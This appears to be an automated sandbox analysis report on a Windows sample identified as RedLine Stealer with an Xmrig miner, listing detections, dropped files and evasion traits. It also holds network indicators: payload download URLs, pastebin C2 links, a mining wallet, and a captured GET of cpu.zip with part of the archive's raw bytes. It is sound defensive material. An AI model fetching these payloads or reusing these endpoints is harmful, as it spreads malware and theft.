Analysis Report SecuriteInfo.com.Trojan.GenericKD.45754886.17334.7781

Overview

General Information

Sample Name: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.7781 (renamed file extension from 7781 to exe)
Analysis ID: 356837
MD5: bc584a3be92cfdfda79446372fffa46d
SHA1: 6f7d11b7c795bd1f48a078f05d8a4c5600448a03
SHA256: 8086d2b05316a9b44f55971a6c90da8ecb069d075973654f5f914229dc3070f6
Infos:

Most interesting Screenshot:

Detection

RedLine Xmrig
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Xmrig
Yara detected RedLine Stealer
Yara detected Xmrig cryptocurrency miner
Binary contains a suspicious time stamp
Connects to a pastebin service (likely for C&C)
Detected Stratum mining protocol
Found strings related to Crypto-Mining
Hides threads from debuggers
Machine Learning detection for dropped file
May check the online IP address of the machine
PE file contains section with special chars
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Uses schtasks.exe or at.exe to add and modify task schedules
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

AV Detection:

barindex
Antivirus detection for URL or domain
Source: https://blog.agencia10x.com/dance.exe Avira URL Cloud: Label: malware
Source: https://blog.agencia10x.com/mex.exe Avira URL Cloud: Label: malware
Found malware configuration
Source: cpu.exe.6624.16.memstr Malware Configuration Extractor: Xmrig {"WALLET": "42ZYH6myZTcdLqfmCpSCggN8ppdku4PK16kH8UFFyTesddFwT5ihd2QFsWS2BGnuwXWfnrtbJbr5w7dqgeBRZDJcUzia53j", "POOL": "pool.minexmr"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Metadefender: Detection: 21% Perma Link
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Local\zmql3v0y.exe ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe Metadefender: Detection: 16% Perma Link
Source: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe ReversingLabs: Detection: 60%
Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Metadefender: Detection: 21% Perma Link
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe ReversingLabs: Detection: 28%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Joe Sandbox ML: detected

Bitcoin Miner:

barindex
Yara detected Xmrig cryptocurrency miner
Source: Yara match File source: 00000010.00000002.547615511.0000020FCC320000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.547631429.0000020FCC328000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.319692642.0000000000D82000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.328721362.0000000003CD1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.520808342.0000000000B32000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.324849643.0000020FCC35B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.547665443.0000020FCC34B000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.282484459.0000000001AC0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000003.317443395.00000000015F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.318537012.0000000003391000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: cpu.exe PID: 6624, type: MEMORY
Source: Yara match File source: Process Memory Space: zmql3v0y.exe PID: 4012, type: MEMORY
Source: Yara match File source: Process Memory Space: RantimeBroker.exe PID: 6552, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Roaming\Windows\CPU\config.json, type: DROPPED
Source: Yara match File source: 6.2.zmql3v0y.exe.b30000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.RantimeBroker.exe.d80000.0.unpack, type: UNPACKEDPE
Detected Stratum mining protocol
Source: global traffic TCP traffic: 192.168.2.5:49731 -> 88.99.193.240:4444 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"42zyh6myztcdlqfmcpscggn8ppdku4pk16kh8uffytesddfwt5ihd2qfsws2bgnuwxwfnrtbjbr5w7dqgebrzdjcuzia53j./","pass":"x","agent":"xmrig/6.8.0 (windows nt 10.0; win64; x64) libuv/1.40.0 msvc/2019","algo":["cn/r","cn/2","cn/1","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/ccx","rx/0","rx/wow","rx/arq","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/wrkz","astrobwt"]}}.
Found strings related to Crypto-Mining
Source: zmql3v0y.exe String found in binary or memory: -o stratum+tcp://
Source: zmql3v0y.exe String found in binary or memory: -o stratum+tcp://
Source: zmql3v0y.exe String found in binary or memory: pool.minexmr.com:4444

Compliance:

barindex
Uses 32bit PE files
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Uses secure TLS version for HTTPS connections
Source: unknown HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.5:49719 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.23.99.190:443 -> 192.168.2.5:49720 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.213.210:443 -> 192.168.2.5:49721 version: TLS 1.2
Source: unknown HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.5:49730 version: TLS 1.2
Binary contains paths to debug symbols
Source: Binary string: Z:\Development\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.278594567.00000000002F0000.00000040.00020000.sdmp, zmql3v0y.exe, 00000006.00000002.520873342.0000000000B40000.00000040.00020000.sdmp, RantimeBroker.exe, 0000000F.00000002.319896827.0000000000D90000.00000040.00020000.sdmp
Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: WinRing0x64.sys.6.dr

Networking:

barindex
Connects to a pastebin service (likely for C&C)
Source: unknown DNS query: name: pastebin.com
May check the online IP address of the machine
Source: unknown DNS query: name: iplogger.org
Source: unknown DNS query: name: iplogger.org
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.5:49731 -> 88.99.193.240:4444
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /cpu.zip HTTP/1.1Host: 195.2.84.91Connection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 104.23.99.190 104.23.99.190
Source: Joe Sandbox View IP Address: 104.23.99.190 104.23.99.190
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: unknown TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 23 Feb 2021 16:37:53 GMTContent-Type: application/zipContent-Length: 6296834Connection: keep-aliveKeep-Alive: timeout=60Last-Modified: Sat, 20 Feb 2021 21:11:22 GMTETag: "601502-5bbcb02b93280"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 01 7a 3a 52 67 77 19 1f bf 02 00 00 e3 08 00 00 0b 00 00 00 63 6f 6e 66 69 67 2e 6a 73 6f 6e ad 56 c9 6e db 30 10 bd e7 2b 02 9d 43 d7 76 e1 16 e8 2d 40 72 4b 51 20 69 51 14 45 61 8c a9 b1 c4 9a e2 b0 43 ca 4b 8b fc 7b 49 79 89 44 d3 45 0e 95 01 43 9a c7 19 3d 3e ce a2 3f 57 d7 e1 2a c0 aa e2 c3 f5 fe a1 33 a8 32 3c 9b 56 eb 9b 17 db 86 78 85 2c 4e 50 87 3c ef 17 14 b5 f7 76 18 02 0d 2c 34 c6 c5 4b d0 0e 7b 81 6a 72 3e 98 8b c9 f4 fd 68 1c 7e 93 a2 07 5a e2 08 8e 7b 26 90 12 9d 13 9e 56 68 ce 69 31 3a cf 4a fa ee 55 9e 5b 1c f0 82 d6 93 83 35 1e b0 83 75 01 72 55 31 b5 26 a1 57 48 d2 c4 6e bf f8 68 f3 ca eb c4 9f c1 94 d4 6c 13 cd 8c 8a cc c5 e4 66 68 13 b0 de 4e 53 a0 a1 32 c6 ec f8 f5 b7 3f a9 16 c2 42 85 2e a3 1b 97 8d e3 01 91 ce bc e1 ac 59 82 ac 71 fe 8b 72 91 4c db c0 b9 87 93 0c 5e d6 16 ca b9 65 5c 62 b8 9f 1f 78 4e 06 a2 4a db 5e 3a eb 24 64 dd 56 78 da cf 45 4c fc 54 3e 97 27 1b 01 e8 ce 4f dc b2 22 56 7e 77 8e 34 d8 10 ef 84 25 d2 99 78 3b 85 3a c3 b1 81 ad f0 35 23 94 4e d4 ca 44 26 93 f1 20 ff 5c 73 ee 05 5c 91 99 0a d5 58 9d f0 e8 3c 3c d3 62 e3 45 8c ed d4 ef 28 e1 6c d6 8f 29 cd 9b 71 86 a2 34 42 2b 8f 59 6c 05 1b 4b 9b 23 30 38 10 b2 68 a4 7e 6d fd 75 99 71 be 23 4d 50 22 67 e4 d6 e0 97 c4 51 83 e2 f6 e3 5d 3f 5b a1 d4 99 c4 fb c7 d6 fa 5b 1b a6 54 5b c2 6b f9 5f 22 6a d6 cd ff a2 53 92 01 8f 42 e3 1a 63 c8 c9 d0 4c eb d0 07 2d d3 76 d7 c3 34 55 62 a9 34 0e 78 15 31 15 63 0a 7f 3f bd f9 65 8b dd 02 d0 15 ed 5d 0e 2e 2f 0c 49 99 3c d2 72 24 75 60 33 5a 4f 47 db 86 55 35 92 d4 7c 78 1b ae 22 5d ee 3a b5 8a 6f 9f be 3c ce bf de 3e 3c dc 7f 9e df de dd 3d de 3f 3d a5 4b 2d b8 c8 b6 d8 a6 40 88 2f 4e 9d 3f c1 8c 92 58 83 ab 8f 4a 26 f0 0a d1 82 56 6b bc 80 5f 6a 1e 1d e8 3b f5 96 19 b7 80 04 bd 4d 85 6c 79 5f b5 19 6a 25 84 8e 60 2e 44 70 24 57 6e 96 77 74 a8 97 22 fc a1 f4 fd 71 17 af e7 ee ee c7 f1 80 e3 cb 85 57 4d dc de bb 43 89 17 35 82 f6 b5 c8 83 65 a3 92 71 82 61 82 75 9d 6e d6 b3 84 3e 06 e1 e8 7a 56 b7 73 21 cb 92 91 e5 b5 7b 6d e1 84 94 f5 24 f7 09 99 d4 8e 44 f6 79 eb 7c 85 99 4e 2b 95 ad 91 dd 45 a0 0d b5 95 41 cb 30 5d 18 9a dc 17 44 cc 52 11 a6 41 72 94 45 a8 b5 05 75 32 1c f5 db c4 29 35 54 b0 53 4a 90 11 0b f0 1e 79 77 2a ea e7 ab bf 50 4b 03 04 14 00 00 00 08 00 54 22 55 52 75 cb 47 e4 24 f1 5f 00 a8 20 69 00 07 00 00 00 63 70 75 2e 65 78 65 ec 5a 67 38 9c c1 16 5e bd f7 1e ac 2e da 25 11 2d 08 bb ca ea bd 5b 96 d5 3b 57 09 82 20 08 a2 13 bd 44 59 9d e8 65 b5 25 88 84 10 82 88 16 36 ba 10 5c d1 89 bb dc de ef cf fb e3 ce b3 fb 9c ef 9b 79 e7 cc 99 73 e6 9d 6f bf 39 ab 65 9e 0c c0 01 00 00 b8 98 ef f5 35 00 d0 0e f8 43 01 01 fe 73 b9 87 05 00 90 b3 75 90 03 9a 89 46 39 da b1 34 47 39 0c 9d 9c 7d d8 bd bc 3d 1d b
Source: global traffic HTTP traffic detected: GET /cpu.zip HTTP/1.1Host: 195.2.84.91Connection: Keep-Alive
Source: unknown DNS traffic detected: queries for: iplogger.org
Source: zmql3v0y.exe, zmql3v0y.exe, 00000006.00000002.520808342.0000000000B32000.00000020.00020000.sdmp, RantimeBroker.exe, RantimeBroker.exe, 0000000F.00000002.319692642.0000000000D82000.00000020.00020000.sdmp String found in binary or memory: http://195.2.84.91/amd.zip
Source: zmql3v0y.exe, zmql3v0y.exe, 00000006.00000002.520808342.0000000000B32000.00000020.00020000.sdmp, RantimeBroker.exe, RantimeBroker.exe, 0000000F.00000002.319692642.0000000000D82000.00000020.00020000.sdmp String found in binary or memory: http://195.2.84.91/cpu.zip
Source: zmql3v0y.exe, zmql3v0y.exe, 00000006.00000002.520808342.0000000000B32000.00000020.00020000.sdmp, RantimeBroker.exe, RantimeBroker.exe, 0000000F.00000002.319692642.0000000000D82000.00000020.00020000.sdmp String found in binary or memory: http://195.2.84.91/nvidia.zip
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283866896.000000000331A000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.281148761.0000000001165000.00000004.00000020.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.281148761.0000000001165000.00000004.00000020.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: WinRing0x64.sys.6.dr String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: WinRing0x64.sys.6.dr String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: WinRing0x64.sys.6.dr String found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
Source: WinRing0x64.sys.6.dr String found in binary or memory: http://crl.globalsign.net/primobject.crl0
Source: pg2bsuqa.exe.0.dr String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283866896.000000000331A000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.280945530.0000000001122000.00000004.00000020.sdmp String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe String found in binary or memory: http://crl3.digicert.com/ha-cs-2011a.crl0.
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283866896.000000000331A000.00000004.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0L
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe String found in binary or memory: http://crl4.digicert.com/ha-cs-2011a.crl0L
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.281148761.0000000001165000.00000004.00000020.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
Source: pg2bsuqa.exe.0.dr String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.281148761.0000000001165000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.com
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.281148761.0000000001165000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283866896.000000000331A000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.280945530.0000000001122000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.digicert.com0:
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe String found in binary or memory: http://ocsp.digicert.com0H
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe String found in binary or memory: http://ocsp.digicert.com0I
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe String found in binary or memory: http://ocsp.digicert.com0P
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.281148761.0000000001165000.00000004.00000020.sdmp, pg2bsuqa.exe.0.dr String found in binary or memory: http://ocsp.sectigo.com0
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe String found in binary or memory: http://ocsp.thawte.com0
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe String found in binary or memory: http://s.symcd.com06
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283685326.0000000003281000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283892138.0000000003346000.00000004.00000001.sdmp String found in binary or memory: https://blog.agencia10x.com/dance.exe
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283892138.0000000003346000.00000004.00000001.sdmp String found in binary or memory: https://blog.agencia10x.com/dance.exed
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283866896.000000000331A000.00000004.00000001.sdmp String found in binary or memory: https://blog.agencia10x.com/mex.exe
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283866896.000000000331A000.00000004.00000001.sdmp String found in binary or memory: https://blog.agencia10x.com4
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283892138.0000000003346000.00000004.00000001.sdmp String found in binary or memory: https://blog.agencia10x.comD8
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe String found in binary or memory: https://d.symcb.com/cps0%
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe String found in binary or memory: https://d.symcb.com/rpa0
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe String found in binary or memory: https://d.symcb.com/rpa0.
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283685326.0000000003281000.00000004.00000001.sdmp String found in binary or memory: https://iplogger.org
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.278531237.00000000002E2000.00000020.00020000.sdmp, SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283685326.0000000003281000.00000004.00000001.sdmp String found in binary or memory: https://iplogger.org/1r2et7
Source: zmql3v0y.exe, zmql3v0y.exe, 00000006.00000002.520808342.0000000000B32000.00000020.00020000.sdmp, RantimeBroker.exe, RantimeBroker.exe, 0000000F.00000002.319692642.0000000000D82000.00000020.00020000.sdmp String found in binary or memory: https://iplogger.org/1tsef7
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283685326.0000000003281000.00000004.00000001.sdmp String found in binary or memory: https://pastebin.com/raw/WmBNYXYN
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283685326.0000000003281000.00000004.00000001.sdmp String found in binary or memory: https://pastebin.com/raw/bnxCb5RP
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.278531237.00000000002E2000.00000020.00020000.sdmp String found in binary or memory: https://pastebin.com/raw/bnxCb5RPChttps://pastebin.com/raw/WmBNYXYN
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283839555.00000000032C8000.00000004.00000001.sdmp String found in binary or memory: https://pastebin.com4
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283866896.000000000331A000.00000004.00000001.sdmp String found in binary or memory: https://pastebin.comD8
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283866896.000000000331A000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283801731.00000000032C0000.00000004.00000001.sdmp String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.281148761.0000000001165000.00000004.00000020.sdmp String found in binary or memory: https://sectigo.com/CPS0
Source: pg2bsuqa.exe.0.dr String found in binary or memory: https://sectigo.com/CPS0D
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe String found in binary or memory: https://www.digicert.com/CPS0
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.5:49719 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.23.99.190:443 -> 192.168.2.5:49720 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.213.210:443 -> 192.168.2.5:49721 version: TLS 1.2
Source: unknown HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.5:49730 version: TLS 1.2

System Summary:

barindex
PE file contains section with special chars
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Static PE information: section name:
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Static PE information: section name:
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Static PE information: section name:
Source: pg2bsuqa.exe.0.dr Static PE information: section name:
Source: pg2bsuqa.exe.0.dr Static PE information: section name:
Source: pg2bsuqa.exe.0.dr Static PE information: section name:
Source: zmql3v0y.exe.0.dr Static PE information: section name:
Source: zmql3v0y.exe.0.dr Static PE information: section name:
Source: zmql3v0y.exe.0.dr Static PE information: section name:
Source: RantimeBroker.exe.6.dr Static PE information: section name:
Source: RantimeBroker.exe.6.dr Static PE information: section name:
Source: RantimeBroker.exe.6.dr Static PE information: section name:
Creates driver files
Source: C:\Users\user\AppData\Local\zmql3v0y.exe File created: C:\Users\user\AppData\Roaming\Windows\CPU\WinRing0x64.sys Jump to behavior
Detected potential crypto function
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Code function: 4_2_003D1D30 4_2_003D1D30
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Code function: 4_2_003D4928 4_2_003D4928
Dropped file seen in connection with other malware
